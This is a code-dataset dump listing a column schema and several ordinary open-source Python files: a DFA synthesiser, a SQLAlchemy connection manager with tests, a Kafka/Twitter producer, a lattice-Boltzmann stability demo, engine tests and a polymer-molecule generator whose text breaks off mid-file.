column                 type      value / length range
---------------------  --------  --------------------
max_stars_repo_path    string    length 3 to 269
max_stars_repo_name    string    length 4 to 119
max_stars_count        int64     0 to 191k
id                     string    length 1 to 7
content                string    length 6 to 1.05M
score                  float64   0.23 to 5.13
int_score              int64     0 to 5
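Each record below follows this schema: repository path and name, star count, an id, the raw file content, and a quality score with its integer rounding. A minimal sketch of filtering such a dump with pandas; the file name dump.jsonl and the thresholds are assumptions for illustration, not part of the dataset:

import pandas as pd

# Hypothetical export of rows like the ones below; the real dataset name/path is not given here.
df = pd.read_json("dump.jsonl", lines=True)

# Keep well-scored, reasonably sized files only (thresholds are illustrative).
filtered = df[(df["int_score"] >= 3) & (df["content"].str.len() < 100_000)]

print(filtered[["max_stars_repo_name", "max_stars_repo_path", "score"]].head())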
tests/__init__.py
bio2bel/famplex
0
11800
<reponame>bio2bel/famplex<filename>tests/__init__.py
# -*- coding: utf-8 -*-

"""Tests for Bio2BEL FamPlex."""
0.847656
1
dfainductor/algorithms/searchers.py
ctlab/DFA-Inductor-py
2
11801
<gh_stars>1-10
from typing import List, Optional

from pysat.solvers import Solver

from ..variables import VarPool
from .reductions import ClauseGenerator
from ..examples import BaseExamplesProvider
from ..logging_utils import *
from ..statistics import STATISTICS
from ..structures import APTA, DFA, InconsistencyGraph


class LSUS:
    _solver: Solver

    def __init__(self,
                 apta: APTA,
                 ig: InconsistencyGraph,
                 solver_name: str,
                 sb_strategy: str,
                 cegar_mode: str,
                 examples_provider: BaseExamplesProvider,
                 assumptions_mode: str) -> None:
        self._apta = apta
        self._ig = ig
        self._solver_name = solver_name
        self._sb_strategy = sb_strategy
        self._cegar_mode = cegar_mode
        self._examples_provider = examples_provider
        self._assumptions_mode = assumptions_mode
        self._var_pool: VarPool = VarPool()
        self._clause_generator = ClauseGenerator(self._apta,
                                                 self._ig,
                                                 self._var_pool,
                                                 self._assumptions_mode,
                                                 self._sb_strategy)

    def _try_to_synthesize_dfa(self, size: int, assumptions: List[int]) -> Optional[DFA]:
        log_info('Vars in CNF: {0}'.format(self._solver.nof_vars()))
        log_info('Clauses in CNF: {0}'.format(self._solver.nof_clauses()))
        STATISTICS.start_solving_timer()
        is_sat = self._solver.solve(assumptions=assumptions)
        STATISTICS.stop_solving_timer()
        if is_sat:
            assignment = self._solver.get_model()
            dfa = DFA()
            for i in range(size):
                dfa.add_state(
                    DFA.State.StateStatus.from_bool(assignment[self._var_pool.var('z', i) - 1] > 0)
                )
            for i in range(size):
                for label in range(self._apta.alphabet_size):
                    for j in range(size):
                        if assignment[self._var_pool.var('y', i, label, j) - 1] > 0:
                            dfa.add_transition(i, self._apta.alphabet[label], j)
            return dfa
        else:
            return None

    def search(self, lower_bound: int, upper_bound: int) -> Optional[DFA]:
        self._solver = Solver(self._solver_name)
        log_info('Solver has been started.')
        for size in range(lower_bound, upper_bound + 1):
            if self._assumptions_mode == 'none' and size > lower_bound:
                self._solver = Solver(self._solver_name)
                log_info('Solver has been restarted.')
            log_br()
            log_info('Trying to build a DFA with {0} states.'.format(size))

            STATISTICS.start_formula_timer()
            if self._assumptions_mode != 'none' and size > lower_bound:
                self._clause_generator.generate_with_new_size(self._solver, size - 1, size)
            else:
                self._clause_generator.generate(self._solver, size)
            STATISTICS.stop_formula_timer()

            assumptions = self._clause_generator.build_assumptions(size, self._solver)
            while True:
                dfa = self._try_to_synthesize_dfa(size, assumptions)
                if dfa:
                    counter_examples = self._examples_provider.get_counter_examples(dfa)
                    if counter_examples:
                        log_info('An inconsistent DFA with {0} states is found.'.format(size))
                        log_info('Added {0} counterexamples.'.format(len(counter_examples)))

                        STATISTICS.start_apta_building_timer()
                        (new_nodes_from, changed_statuses) = self._apta.add_examples(counter_examples)
                        STATISTICS.stop_apta_building_timer()

                        STATISTICS.start_ig_building_timer()
                        self._ig.update(new_nodes_from)
                        STATISTICS.stop_ig_building_timer()

                        STATISTICS.start_formula_timer()
                        self._clause_generator.generate_with_new_counterexamples(self._solver,
                                                                                 size,
                                                                                 new_nodes_from,
                                                                                 changed_statuses)
                        STATISTICS.stop_formula_timer()
                        continue
                break

            if not dfa:
                log_info('Not found a DFA with {0} states.'.format(size))
            else:
                log_success('The DFA with {0} states is found!'.format(size))
                return dfa
        return None
2.1875
2
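LSUS.search above combines iterative deepening over the DFA size with counterexample-guided refinement: solve, check the candidate against held-out examples, add clauses for any counterexamples, and only grow the size when the formula is unsatisfiable. A stripped-down sketch of that control flow, with try_size, get_counter_examples, and add_counter_examples as stand-in callables (not part of the original code):

from typing import Callable, List, Optional


def cegar_search(lower: int, upper: int,
                 try_size: Callable[[int], Optional[object]],
                 get_counter_examples: Callable[[object], List[object]],
                 add_counter_examples: Callable[[List[object]], None]) -> Optional[object]:
    """Iterative deepening + CEGAR skeleton mirroring LSUS.search (illustrative only)."""
    for size in range(lower, upper + 1):
        while True:
            candidate = try_size(size)            # SAT call for a DFA with `size` states
            if candidate is None:
                break                             # UNSAT: grow the DFA size
            ces = get_counter_examples(candidate)
            if not ces:
                return candidate                  # consistent DFA found
            add_counter_examples(ces)             # refine the formula, re-solve at the same size
    return None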
lc_sqlalchemy_dbutils/manager.py
libcommon/sqlalchemy-dbutils-py
0
11802
<reponame>libcommon/sqlalchemy-dbutils-py ## -*- coding: UTF8 -*- ## manager.py ## Copyright (c) 2020 libcommon ## ## Permission is hereby granted, free of charge, to any person obtaining a copy ## of this software and associated documentation files (the "Software"), to deal ## in the Software without restriction, including without limitation the rights ## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ## copies of the Software, and to permit persons to whom the Software is ## furnished to do so, subject to the following conditions: ## ## The above copyright notice and this permission notice shall be included in all ## copies or substantial portions of the Software. ## ## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ## SOFTWARE. from getpass import getpass import os from pathlib import Path from typing import Any, Optional, Union from sqlalchemy import create_engine as sqla_create_engine, MetaData from sqlalchemy.engine import Engine from sqlalchemy.engine.url import make_url, URL from sqlalchemy.orm import scoped_session as ScopedSession, Session, sessionmaker as SessionMaker from sqlalchemy.orm.query import Query __author__ = "libcommon" DBManagerSessionFactory = Union[ScopedSession, SessionMaker] DBManagerSession = Union[ScopedSession, Session] ConnectionURL = Union[str, URL] class DBManager: """SQLAlchemy ORM database connection manager with utility methods for connecting to, querying, performing/rolling back transactions on, and deleting records from the database. Agnostic to database backend and designed for use within a single process (not shared by multiple processes.) """ __slots__ = ("_engine", "_scoped_sessions", "_session", "_session_factory", "connection_url", "metadata",) @classmethod def from_file(cls, config_path_str: str) -> "DBManager": """ Args: config_path => path to file containing connection URL Description: Reads connection URL from config file and creates instance of class. Will validate connection URL and if it doesn't have password, will prompt user. Preconditions: Connection URL must be a valid RFC1738 URL and must be the only content in the file. 
Raises: FileNotFoundError: if provided config_path isn't an existing file ValueError: if validation (parsing) of connection URL fails """ # Ensure config_path is existing file config_path = Path(config_path_str) if not config_path.is_file(): raise FileNotFoundError(str(config_path)) # Read first line from file and use as connection URL with open(str(config_path)) as config_file: connection_url_str = config_file.read().strip() # Parse connection URL into various components try: connection_url = make_url(connection_url_str) except Exception as exc: raise ValueError("Failed to parse URL from file ({})".format(exc)) # If is not SQLite file and password not provided, get password from user if not ("sqlite" in connection_url.drivername or connection_url.password): passwd = getpass("Enter database password: ") connection_url.password = <PASSWORD> return cls(connection_url) def __init__(self, connection_url: ConnectionURL, metadata: Optional[MetaData] = None, scoped_sessions: bool = False): if isinstance(connection_url, str): connection_url = make_url(connection_url) self.connection_url = connection_url self.metadata = metadata self._scoped_sessions = scoped_sessions self._engine: Optional[Engine] = None self._session: Optional[Session] = None self._session_factory: Optional[DBManagerSessionFactory] = None def create_engine(self, **kwargs) -> "DBManager": """ Args: kwargs => passed to SQLAlchemy Engine constructor Description: Create SQLAlchemy Engine using self.connection_url. See: https://docs.sqlalchemy.org/en/13/core/engines.html Preconditions: N/A Raises: RuntimeError: if self.engine is already set and persist is True """ # Ensure self._engine isn't already defined # NOTE: Consider whether this implementation makes sense, or if it makes more sense # to simply dispose of existing engine (with DEBUG log) before creating new one. if self._engine: raise RuntimeError("Cannot attach new Engine without removing existing one") # Create SQLAlchemy Engine with connection URL engine = sqla_create_engine(self.connection_url, **kwargs) self._engine = engine return self def close_engine(self) -> "DBManager": """ Args: N/A Description: Close and dispose of existing Engine and connection pool on self._engine if defined. Preconditions: N/A Raises: N/A """ # If have active session, close it before engine if self.session(): self.close_session() # If self._engine defined if self._engine: # Dispose of existing connection pool self._engine.dispose() self._engine = None return self def with_metadata(self, metadata: MetaData) -> "DBManager": """ Args: N/A Description: Setter for self.metadata using builder pattern. Preconditions: N/A Raises: N/A """ self.metadata = metadata return self def bootstrap_db(self) -> "DBManager": """ Args: N/A Description: Create all tables defined in self.metadata. See: https://docs.sqlalchemy.org/en/13/core/metadata.html Preconditions: N/A Raises: N/A """ if not self._engine: raise RuntimeError("Cannot bootstrap database without an Engine") if not self.metadata: raise RuntimeError("Cannot bootstrap database with MetaData") self.metadata.create_all(self._engine) return self def create_session_factory(self, **kwargs) -> "DBManager": """ Args: kwargs => passed to SQLAlchemy sessionmaker constructor Description: Create SQLAlchemy scoped_session if self._scoped_sessions is True, otherwise sessionmaker. All kwargs are passed to sessionmaker constructor. This method should only be called _once_ by the DBManager. 
SQLAlchemy doesn't recommend manually closing all sessions, and the mechanics for doing so have changed across versions. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#session-and-sessionmaker and https://docs.sqlalchemy.org/en/13/orm/contextual.html#sqlalchemy.orm.scoping.scoped_session and https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.sessionmaker.close_all Preconditions: N/A Raises: RuntimeError: if self._session_factory is already defined, or if self._engine isn't defined """ # Ensure self._session_factory isn't already defined if self._session_factory: raise RuntimeError("Session factory already created") # Ensure self._engine is defined if not self._engine: raise RuntimeError("Cannot create session factory without an Engine") # Generate sessionmaker session factory self._session_factory = SessionMaker(bind=self._engine, **kwargs) # If scoped sessions, wrap in scoped_sessions factory if self._scoped_sessions: self._session_factory = ScopedSession(self._session_factory) return self def connect(self, bootstrap: bool = False) -> "DBManager": """ Args: N/A Description: Create database engine and session factory (but _not_ active session). gen_session must be called subsequently to create an active session. If bootstrap specified, use self.metdata and self._engine to create all tables, indexes, views, etc. Preconditions: N/A Raises: ValueError: if bootstrap and self.metadata isn't defined """ # Generate database engine if needed if not self._engine: self.create_engine() # Bootstrap database if asked if bootstrap: self.bootstrap_db() # Generate session factory if needed if not self._session_factory: self.create_session_factory() return self def gen_session(self, persist: bool = True) -> DBManagerSession: """ Args: persist => whether to persist created session on self Description: Generate new database session. If persist is True, assign new session to self._session. In this way, the DBManager can act simply as a factory for new sessions, or as a more complete DB manager. Use the `session` method to access the active session. See: https://docs.sqlalchemy.org/en/13/orm/session_basics.html#basics-of-using-a-session Preconditions: N/A Raises: RuntimeError: if self._session_factory hasn't been created yet, or if self._session is already set and persist is True (for non-scoped sessions) """ # Ensure session factory has been created if not self._session_factory: raise RuntimeError("Session factory must be created before a session can be generated") # If scoped sessions, return scoped session manager if self._scoped_sessions: return self._session_factory # type: ignore # Otherwise, generate new session from session factory session = self._session_factory() # If persist session to self, ensure self.session isn't already defined if persist: if self._session: raise RuntimeError("Cannot attach new Session without removing existing Session") self._session = session return session def session(self) -> Optional[DBManagerSession]: """ Args: N/A Description: Current session (if exists). Preconditions: N/A Raises: N/A """ # If scoped sessions, return scoped session manager if self._scoped_sessions: return self._session_factory # type: ignore # Otherwise, return self._session return self._session def close_session(self) -> "DBManager": """ Args: N/A Description: Close the current session. 
Preconditions: N/A Raises: N/A """ # If scoped sessions and session factory has been initialized, # remove current session if self._scoped_sessions and self._session_factory: self._session_factory.remove() # type: ignore # If session on self, close it elif self._session: self._session.close() self._session = None return self def _assert_session(self) -> DBManagerSession: """ Args: N/A Description: Raise ValueError if no existing session. If scoped_sessions is True, then requires self._session_factory to be defined. Otherwise, requires self._session to be defined (non-None). Preconditions: N/A Raises: ValueError: if self._session not defined """ session = self.session() if not session: raise RuntimeError("Must have active session") return session def query(self, model: Any, **kwargs) -> Query: """ Args: model => model of table to query kwargs => passed to query.filter method Description: Wrapper for Session.query, with option to build WHERE clause. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.query Preconditions: record is instance of class whose parent class was created using SQLAlchemy's declarative_base. Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() query = session.query(model) for arg in kwargs: query = query.filter(getattr(model, arg) == kwargs[arg]) return query def add(self, record: Any, commit: bool = False) -> "DBManager": """ Args: record => record to add to session commit => whether to commit the transaction after adding record to session Description: Wrapper for Session.add, with option to commit the transaction. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.add Preconditions: record is instance of class whose parent class was created using SQLAlchemy's declarative_base. Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() # Add record to session session.add(record) # Commit if asked if commit: session.commit() return self def delete(self, record: Any, commit: bool = False) -> "DBManager": """ Args: record => record to delete from session commit => whether to commit the transaction after deleting record from session Description: Wrapper for Session.delete, with option to commit the transaction. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.delete Preconditions: record is instance of class whose parent class was created using SQLAlchemy's declarative_base. Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() # Delete record from session session.delete(record) # Commit if asked if commit: session.commit() return self def commit(self) -> "DBManager": """ Args: N/A Description: Wrapper for Session.commit. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.commit Preconditions: N/A Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() session.commit() return self def rollback(self) -> "DBManager": """ Args: N/A Description: Wrapper for Session.rollback. 
See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.rollback Preconditions: N/A Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() session.rollback() return self if os.environ.get("ENVIRONMENT") == "TEST": import unittest from unittest.mock import patch, mock_open from tests.common import BaseTable, User class TestDBManager(unittest.TestCase): """Tests for DBManager API.""" def setUp(self): self.connection_url_default = "postgresql://dbuser@pghost10/appdb" self.connection_url_with_password = "postgresql://dbuser:kx%25jj5%2Fg@pghost10/appdb" self.connection_url_sqlite = "sqlite://" def test_from_file_invalid_filepath(self): """Test that invalid filepath to DBManager.from_file raises FileNotFoundError. """ nonexistent_filepath = Path().cwd().joinpath("url_config.txt") self.assertRaises(FileNotFoundError, DBManager.from_file, nonexistent_filepath) def test_from_file_invalid_url(self): """Test that invalid URL in file passed to DBManager.from_file raises ValueError. """ # |--| port is not number connection_url = "postgresql+pg8000://dbuser:kx%25jj5%2Fg@pghost10:port/appdb" with patch("{}.open".format(__name__), mock_open(read_data=connection_url)): self.assertRaises(ValueError, DBManager.from_file, __file__) def test_from_file_no_passwd_sqlite(self): """Test that if connection URL isn't for SQLite and no password provided, prompts for password and updates database connection URL. """ passwd = "<PASSWORD>" with patch("{}.getpass".format(__name__), return_value=passwd), \ patch("{}.open".format(__name__), mock_open(read_data=self.connection_url_default)): manager = DBManager.from_file(__file__) self.assertEqual(passwd, manager.connection_url.password) def test_create_engine_with_existing(self): """Test that engine creation raises RuntimeError when engine is already set. """ manager = DBManager(self.connection_url_sqlite).create_engine() self.assertRaises(RuntimeError, manager.create_engine) def test_close_engine_with_existing(self): """Test that engine is set to None if already set.""" manager = DBManager(self.connection_url_sqlite).create_engine() manager.close_engine() self.assertIsNone(manager._engine) def test_bootstrap_db(self): """Test that bootstrap_db raises RuntimeError without Engine and MetaData.""" manager = DBManager(self.connection_url_sqlite) # Bootstrap database without Engine self.assertRaises(RuntimeError, manager.bootstrap_db) manager.create_engine() # Bootstrap database without MetaData self.assertRaises(RuntimeError, manager.bootstrap_db) def test_create_session_factory_without_engine(self): """Test that session factory creation raises RuntimeError without Engine.""" manager = DBManager(self.connection_url_sqlite) self.assertRaises(RuntimeError, manager.create_session_factory) def test_create_session_factory_with_existing(self): """Test that session factory creation raises RuntimeError with existing session factory. 
""" manager = DBManager(self.connection_url_sqlite).connect() self.assertRaises(RuntimeError, manager.create_session_factory) def test_gen_session_without_factory(self): """Test that session generation raises RuntimeError without session factory.""" manager = DBManager(self.connection_url_sqlite) self.assertRaises(RuntimeError, manager.gen_session) manager.create_engine() self.assertRaises(RuntimeError, manager.gen_session) def test_gen_session_non_scoped_persist(self): """Test that non-scoped session persists to self if persist is True.""" manager = DBManager(self.connection_url_sqlite).connect() session = manager.gen_session(persist=True) self.assertIsNotNone(session) self.assertEqual(session, manager._session) def test_close_session_with_existing(self): """Test that persisted session is set to None if already set.""" manager = DBManager(self.connection_url_sqlite).connect() manager.gen_session(persist=True) self.assertIsNotNone(manager._session) manager.close_session() self.assertIsNone(manager._session) def test_session_methods_no_session(self): """Test that query, add, delete, commit, and rollback methods fail without existing Session. """ manager = DBManager(self.connection_url_sqlite, metadata=BaseTable.metadata).connect() user_record = User(first_name="Samuel", last_name="Jackson", email="<EMAIL>") self.assertRaises(RuntimeError, manager.query, User) self.assertRaises(RuntimeError, manager.commit) self.assertRaises(RuntimeError, manager.rollback) for method_name in ("add", "delete"): with self.subTest(test_name=method_name): self.assertRaises(RuntimeError, getattr(manager, method_name), user_record) def test_query_where_clause_kwargs(self): """Test that kwargs supplied to query get properly passed to session.query.filter to build WHERE clause. """ manager = DBManager(self.connection_url_sqlite, metadata=BaseTable.metadata).connect() manager.gen_session(persist=True) expected_query = ("SELECT \"user\".id, \"user\".first_name, \"user\".last_name, \"user\".email " "FROM \"user\" " "WHERE \"user\".first_name = 'Samuel' AND \"user\".email = '<EMAIL>'") query_str = (str(manager .query(User, first_name="Samuel", email="<EMAIL>") .statement .compile(compile_kwargs={"literal_binds": True})) .replace("\n", "")) self.assertEqual(expected_query, query_str)
1.648438
2
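The DBManager record above is built around a fluent/builder API (connect -> gen_session -> add/query -> close_session/close_engine). A minimal usage sketch against an in-memory SQLite URL, assuming a declarative Base and a mapped User model like the ones referenced by the record's tests; the import path is inferred from the record's file path:

from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base   # 1.3/1.4-style import, matching the docs linked in the record

from lc_sqlalchemy_dbutils.manager import DBManager       # module path inferred from the record's file path

Base = declarative_base()


class User(Base):
    """Toy model mirroring the User table used in the record's tests."""
    __tablename__ = "user"
    id = Column(Integer, primary_key=True)
    first_name = Column(String)
    last_name = Column(String)
    email = Column(String)


manager = DBManager("sqlite://", metadata=Base.metadata).connect(bootstrap=True)
manager.gen_session(persist=True)
manager.add(User(first_name="Samuel", last_name="Jackson", email="sam@example.com"), commit=True)
print(manager.query(User, first_name="Samuel").count())   # -> 1
manager.close_session()
manager.close_engine()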
mazeexperiment/__main__.py
NickAnderegg/rpacr-mazeexperiment
0
11803
<gh_stars>0
# -*- coding: utf-8 -*-

"""mazeexperiment.__main__: executed when mazeexperiment directory is called as script."""

from .mazeexperiment import main

main()
1.203125
1
kafka_demo_1/producer.py
Aguinore/udemy_kafka_demo
0
11804
from tweepy import StreamListener, OAuthHandler, Stream from configs import Configs import sys class StdOutListener(StreamListener): def __init__(self, kafka_producer, topic): super().__init__() self.kafka_producer = kafka_producer self.topic = topic """ A listener handles tweets that are received from the stream. """ def on_data(self, data): self.kafka_producer.produce(topic=self.topic, value=data) print(data) return True def on_error(self, status): print(status) def exit_gracefully(kafka_producer): if kafka_producer is not None: kafka_producer.flush(30) print('kafka producer flushed') sys.exit(0) def create_twitter_client(kafka_producer, configs): listener = StdOutListener(kafka_producer, configs.kafka_topic) auth = OAuthHandler(configs.consumer_key, configs.consumer_secret) auth.set_access_token(configs.access_token_key, configs.access_token_secret) return Stream(auth, listener) def create_kafka_producer(): # https://www.confluent.io/blog/introduction-to-apache-kafka-for-python-programmers/ from confluent_kafka import Producer p = Producer({'bootstrap.servers': 'localhost:9092', 'acks': 'all', 'enable.idempotence': 'true', 'compression.type': 'snappy'}) return p configs = Configs() producer = None try: producer = create_kafka_producer() client = create_twitter_client(producer, configs) client.filter(track=configs.twitter_topics) finally: exit_gracefully(producer)
2.625
3
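The producer script above pulls all of its settings from a Configs object (kafka_topic, Twitter credentials, twitter_topics), whose definition is not part of this record. A plausible sketch of such a class reading those values from environment variables; the attribute names come from the script, everything else is an assumption:

import os


class Configs:
    """Illustrative settings holder exposing the attributes the producer script reads."""

    def __init__(self):
        self.kafka_topic = os.environ.get("KAFKA_TOPIC", "tweets")
        self.consumer_key = os.environ["TWITTER_CONSUMER_KEY"]
        self.consumer_secret = os.environ["TWITTER_CONSUMER_SECRET"]
        self.access_token_key = os.environ["TWITTER_ACCESS_TOKEN_KEY"]
        self.access_token_secret = os.environ["TWITTER_ACCESS_TOKEN_SECRET"]
        # Comma-separated list of terms to track on the Twitter stream.
        self.twitter_topics = os.environ.get("TWITTER_TOPICS", "kafka").split(",")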
demo/examples/stability/advection_d2q4.py
bgraille/pylbm
106
11805
""" Stability analysis of the D2Q4 solver for the advection equation d_t(u) + c_x d_x(u) + c_y d_y(u) = 0 """ import sympy as sp import pylbm # pylint: disable=invalid-name # symbolic variables U, X, Y = sp.symbols('U, X, Y') # symbolic parameters LA, CX, CY = sp.symbols('lambda, cx, cy', constants=True) S_1, S_2 = sp.symbols('s1, s2', constants=True) # numerical parameters la = 1. # velocity of the scheme s_1, s_2 = 2., 1. # relaxation parameters c_x, c_y = 0.5, 0.25 # velocity of the advection equation dico = { 'dim': 2, 'scheme_velocity': LA, 'schemes': [ { 'velocities': [1, 2, 3, 4], 'conserved_moments': U, 'polynomials': [1, X, Y, X**2-Y**2], 'relaxation_parameters': [0, S_1, S_1, S_2], 'equilibrium': [ U, CX*U, CY*U, (CX**2-CY**2)*U ], }, ], 'parameters': { LA: la, S_1: s_1, S_2: s_2, CX: c_x, CY: c_y, }, 'relative_velocity': [CX, CY], } scheme = pylbm.Scheme(dico) stab = pylbm.Stability(scheme) stab.visualize({ 'parameters': { CX: { 'range': [0, 1], 'init': c_x, 'step': 0.01, }, CY: { 'range': [0, 1], 'init': c_y, 'step': 0.01, }, S_1: { 'name': r"$s_1$", 'range': [0, 2], 'init': s_1, 'step': 0.01, }, S_2: { 'name': r"$s_2$", 'range': [0, 2], 'init': s_2, 'step': 0.01, }, }, 'number_of_wave_vectors': 4096, })
2.421875
2
glimix_core/_util/_array.py
Horta/limix-inference
7
11806
from numpy import reshape


def vec(x):
    return reshape(x, (-1,) + x.shape[2:], order="F")


def unvec(x, shape):
    return reshape(x, shape, order="F")
3.421875
3
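vec/unvec above implement the column-stacking (Fortran-order) vectorisation operator and its inverse. A quick round-trip check (the two helpers are re-defined so the snippet runs standalone):

from numpy import arange, array_equal, reshape


def vec(x):
    return reshape(x, (-1,) + x.shape[2:], order="F")


def unvec(x, shape):
    return reshape(x, shape, order="F")


A = arange(6).reshape(2, 3)                # [[0, 1, 2], [3, 4, 5]]
v = vec(A)                                 # columns stacked: [0, 3, 1, 4, 2, 5]
assert array_equal(unvec(v, A.shape), A)   # unvec inverts vec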
src/tests/component/test_engine_manager.py
carbonblack/cbc-binary-toolkit
8
11807
# -*- coding: utf-8 -*- # ******************************************************* # Copyright (c) VMware, Inc. 2020-2021. All Rights Reserved. # SPDX-License-Identifier: MIT # ******************************************************* # * # * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT # * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN, # * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED # * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY, # * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE. """Unit tests for the analysis engine""" import pytest from cbc_binary_toolkit import InitializationError from cbc_binary_toolkit.config import Config from cbc_binary_toolkit.engine import LocalEngineManager from cbc_binary_toolkit.schemas import EngineResponseSchema from tests.component.engine_fixtures.mock_engine import MockLocalEngine from tests.component.schema_fixtures.mock_data import VALID_BINARY_METADATA, MISSING_FIELDS_BINARY_METADATA ENGINE_NAME = "MockEngine" @pytest.fixture(scope="session") def config(): """Configuration for all the test cases in this module.""" return Config.load(f""" id: cbc_binary_toolkit version: 0.0.1 engine: name: {ENGINE_NAME} type: local _provider: tests.component.engine_fixtures.mock_engine.MockLocalEngineFactory Test: TestPassed """) # ==================================== Unit TESTS BELOW ==================================== def test_create_engine(config): """Test successful creation of MockLocalEngine""" manager = LocalEngineManager(config) assert isinstance(manager.create_engine(), MockLocalEngine) def test_analyze(config): """Test analyze pass through""" manager = LocalEngineManager(config) assert EngineResponseSchema.validate(manager.analyze(VALID_BINARY_METADATA)) @pytest.mark.parametrize("input", [ MISSING_FIELDS_BINARY_METADATA, {} ]) def test_analyze_invalid_schema(config, input): """Test analyze pass through""" manager = LocalEngineManager(config) result = manager.analyze(input) if result["binary_hash"] is not None: result = EngineResponseSchema.validate(result) assert not result["success"] @pytest.mark.parametrize("engine_config, exception", [ [""" id: cbc_binary_toolkit engine: name: {ENGINE_NAME} type: unknown num_threads: 1 _provider: tests.component.engine_fixtures.mock_engine.MockLocalEngineFactory """, InitializationError], [""" id: cbc_binary_toolkit engine: name: {ENGINE_NAME} type: local _provider: INVALID.INVALID """, ImportError], [""" id: cbc_binary_toolkit engine: name: {ENGINE_NAME} type: local _provider: cbc_binary_toolkit.engine.LocalEngineFactory """, NotImplementedError], [f""" id: cbc_binary_toolkit version: 0.0.1 engine: name: {ENGINE_NAME} type: local _provider: tests.component.engine_fixtures.mock_engine.MockLocalEngineFactory """, AssertionError] ]) def test_failed_init(engine_config, exception): """Test raised exceptions on init of LocalEngineManager""" config = Config.load(engine_config) with pytest.raises(exception): LocalEngineManager(config)
1.9375
2
funolympics/apps.py
codeema/Yokiyo
0
11808
<filename>funolympics/apps.py
from django.apps import AppConfig


class FunolympicsConfig(AppConfig):
    name = 'funolympics'
1.210938
1
src/gt4sd/algorithms/generation/polymer_blocks/core.py
hhhsu0825/gt4sd-core
0
11809
<filename>src/gt4sd/algorithms/generation/polymer_blocks/core.py """PaccMann vanilla generator trained on polymer building blocks (catalysts/monomers).""" import logging import os from dataclasses import field from typing import ClassVar, Dict, Optional, TypeVar from ....domains.materials import SmallMolecule, validate_molecules from ....exceptions import InvalidItem from ....training_pipelines.core import TrainingPipelineArguments from ....training_pipelines.paccmann.core import PaccMannSavingArguments from ...core import AlgorithmConfiguration, GeneratorAlgorithm, Untargeted from ...registry import ApplicationsRegistry from .implementation import Generator logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) T = type(None) S = TypeVar("S", bound=SmallMolecule) class PolymerBlocks(GeneratorAlgorithm[S, T]): def __init__( self, configuration: AlgorithmConfiguration, target: Optional[T] = None ): """Polymer blocks generation. Args: configuration: domain and application specification, defining types and validations. target: unused since it is not a conditional generator. Example: An example for generating small molecules (SMILES) that resembles monomers/catalysts for polymer synthesis:: configuration = PolymerBlocksGenerator() polymer_blocks = PolymerBlocks(configuration=configuration) items = list(polymer_blocks.sample(10)) print(items) """ configuration = self.validate_configuration(configuration) # TODO there might also be a validation/check on the target input super().__init__( configuration=configuration, target=None, # type:ignore ) def get_generator( self, configuration: AlgorithmConfiguration[S, T], target: Optional[T], ) -> Untargeted: """Get the function to sample batches via the Generator. Args: configuration: helps to set up the application. target: context or condition for the generation. Unused in the algorithm. Returns: callable generating a batch of items. """ logger.info("ensure artifacts for the application are present.") self.local_artifacts = configuration.ensure_artifacts() implementation: Generator = configuration.get_conditional_generator( # type: ignore self.local_artifacts ) return implementation.sample def validate_configuration( self, configuration: AlgorithmConfiguration ) -> AlgorithmConfiguration: # TODO raise InvalidAlgorithmConfiguration assert isinstance(configuration, AlgorithmConfiguration) return configuration @ApplicationsRegistry.register_algorithm_application(PolymerBlocks) class PolymerBlocksGenerator(AlgorithmConfiguration[SmallMolecule, None]): """Configuration to generate subunits of polymers.""" algorithm_type: ClassVar[str] = "generation" domain: ClassVar[str] = "materials" algorithm_version: str = "v0" batch_size: int = field( default=32, metadata=dict(description="Batch size used for the generative model sampling."), ) generated_length: int = field( default=100, metadata=dict( description="Maximum length in tokens of the generated molcules (relates to the SMILES length)." ), ) def get_target_description(self) -> Optional[Dict[str, str]]: """Get description of the target for generation. Returns: target description, returns None in case no target is used. 
